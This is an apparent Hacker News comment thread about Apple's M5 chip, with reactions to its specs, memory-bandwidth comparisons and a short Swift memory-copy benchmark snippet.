Imagine Apple released a laptop that shipped without MacOS. Just the hardware, drivers, and the integrated M-series chips.

   The MacBook Zero
jadbox 20 hours ago

... no benchmarks?

lenerdenator 20 hours ago

Now if some game companies would just port their wares to Apple Silicon and the MacOS libraries already...

jhart 16 hours ago

[dead]

jtrn 13 hours ago

No Wi-Fi 7. No 5G. No 16". No bump to max RAM. No upgrade to the screen. No Bluetooth 6. No upgrade for me. I’ll stay with my M1 Max for now.

  • _zoltan_ 13 hours ago

    You're comparing your M1 Max with the base-model M5, not the M5 Max. Chill, it will come.

nake13 20 hours ago

It seems this generation focuses more on GPU and AI acceleration than on the CPU. The M5 chip allows Apple Vision Pro to render 10% more pixels and operate at up to 120 Hz. It delivers up to four times the peak GPU compute performance of the M4, 30% higher graphics performance, and 15% faster multithreaded CPU performance.

YouAreWRONGtoo 12 hours ago

When it allows installing any Linux with working drivers, I will consider it. Otherwise, you can go back to your garage and I will continue to make fun of people using Macs.

  • shitloadofbooks 12 hours ago

    Why do you care so much? Sounds exhausting...

ThrowawayR2 19 hours ago

A computing device named M5 with highly advanced AI capabilities meant for enterprise (or Enterprise) computing environments? Uh-oh, I think I'll pass; I saw this episode of Star Trek (TOS: The Ultimate Computer) before. Hope the owner's manual comes with a warning not to wear a red shirt anywhere near it, dohohoho.

(Perhaps it would be safer to wait for The Next Generation?)

exabrial 20 hours ago

> A nearly 30 percent increase in unified memory bandwidth to 153GB/s

I'll believe the benchmarks, not marketing claims, but here's an observation and a question.

1. The AMD EPYC 4585PX has ~89GB/s with pretty good latency, as long as you use 2 DIMMs.

2. How does this compare to the memory bandwidth and latency of the M1, M2, M3, and M4 in reality, with all of the caveats? It seems like M1 was a monumental leap forward, and everything since has been a retraction.
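
In the meantime, a crude STREAM-style copy test is easy to run yourself (a single-threaded sketch, so it shows what one core can pull, not the full SoC fabric; real benchmarks use several threads and non-temporal stores):

  import Foundation

  let count = 32 * 1024 * 1024                 // 256 MB of doubles
  let src = [Double](repeating: 1.0, count: count)
  var dst = [Double](repeating: 0.0, count: count)

  let start = Date()
  dst.withUnsafeMutableBufferPointer { d in
      src.withUnsafeBufferPointer { s in
          // One big copy: reads src, writes dst.
          memcpy(d.baseAddress!, s.baseAddress!, count * 8)
      }
  }
  let secs = Date().timeIntervalSince(start)

  // 2x the buffer size moves (one read stream + one write stream).
  print(String(format: "%.1f GB/s", 2.0 * Double(count * 8) / 1e9 / secs))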